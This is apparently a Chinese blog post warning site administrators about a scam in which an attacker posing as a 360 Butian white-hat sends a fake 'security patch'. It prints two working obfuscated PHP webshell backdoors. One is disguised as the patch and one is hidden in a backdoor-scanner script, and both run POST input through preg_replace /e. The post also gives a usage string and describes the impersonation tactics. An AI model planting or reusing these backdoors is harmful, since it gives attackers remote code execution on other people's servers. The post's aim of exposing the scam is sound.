如何利用钓鱼黑吃黑

0x00 前言

15年10月写的文章，今天无意翻到了，就刚好贴在博客吧。

博客也很久没更新了。

0x01 钓鱼模式

0x02 神奇补丁程序

这是所谓的安全工程师发给网管的安全代码。

<?php$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];if($MMIC >1000000){  die('404');}if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])){  $__PHP_debug   = array (    'ZendName' => '70,61,73,73',     'ZendPort' => '63,68,65,63,6b',    'ZendSalt' => '202cb962ac59075b964b07152d234b70'  //792e19812fafd57c7ac150af768d95ce  );   $__PHP_replace = array (    pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),    pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),    $__PHP_debug['ZendSalt']  );  $__PHP_request = &$_POST;  $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);   if ($__PHP_token == $__PHP_replace[2])  {    $__PHP_token = preg_replace (      chr(47).$__PHP_token.chr(47).chr(101),      $__PHP_request[$__PHP_replace[1]],      $__PHP_token    );     unset (      $__PHP_debug,      $__PHP_replace,      $__PHP_request,      $__PHP_token    );     if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');   }}

代码我已经将792e19812fafd57c7ac150af768d95ce这个md5换成了123的md5 202cb962ac59075b964b07152d234b70

这个代码一看，如果之前没接触过类似的代码，应该会有很多人会认为：这个代码搞啥玩儿，php内核？

乍眼看，应该没什么后门

百度搜索一下792e19812fafd57c7ac150af768d95ce，看快照，可以发现

最后解密出来其实是利用preg_replace的/e来执行的一句话webshell。

利用方式：pass=123&check=phpinfo();

钓鱼的代码还有以下几种：

有的黑客将后门代码放在 扫描木马后门 的程序里。特别的猥琐

<?php    # return 32md5 back 6    function getMd5($md5 = null) {        $key = substr(md5($md5),26);        return $key;         }         $array = array(            chr(112).chr(97).chr(115).chr(115), //pass            chr(99).chr(104).chr(101).chr(99).chr(107), // check            chr(99).chr(52).chr(53).chr(49).chr(99).chr(99) // c451cc        );        if ( isset($_POST) ){            $request = &$_POST;        }                 elseif ( isset($_REQUEST) )  $request = &$_REQUEST;                if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) {             if ( getMd5($request[$array[0]]) == $array[2] ) {  //md5(pass) == c451cc                $token = preg_replace (                chr(47) . $array[2] . chr(47) . chr(101),  //  /c451cc/e                $request[$array[1]],                 $array[2]            );        }    }?>

0x03 具体钓鱼

下面是一个黑客钓鱼的真实场景。先看下黑阔的背景身份。

1. 伪装安全工程师

个人主页： http://loudong.360.cn/vul/profile/uid/2822960/

伪装成360补天的一名白帽子，并且把自己QQ地址写成360公司的地址

但是黑客却以为补天的白帽子就是360的员工

不过站长也确实信了他360的身份。因为改的备注是 360安全小组

1. 强调补丁的强大

用了补丁代码，*地址立马404。还用chattr +i 设置文件为read only

0x04 总结

安全，从我做起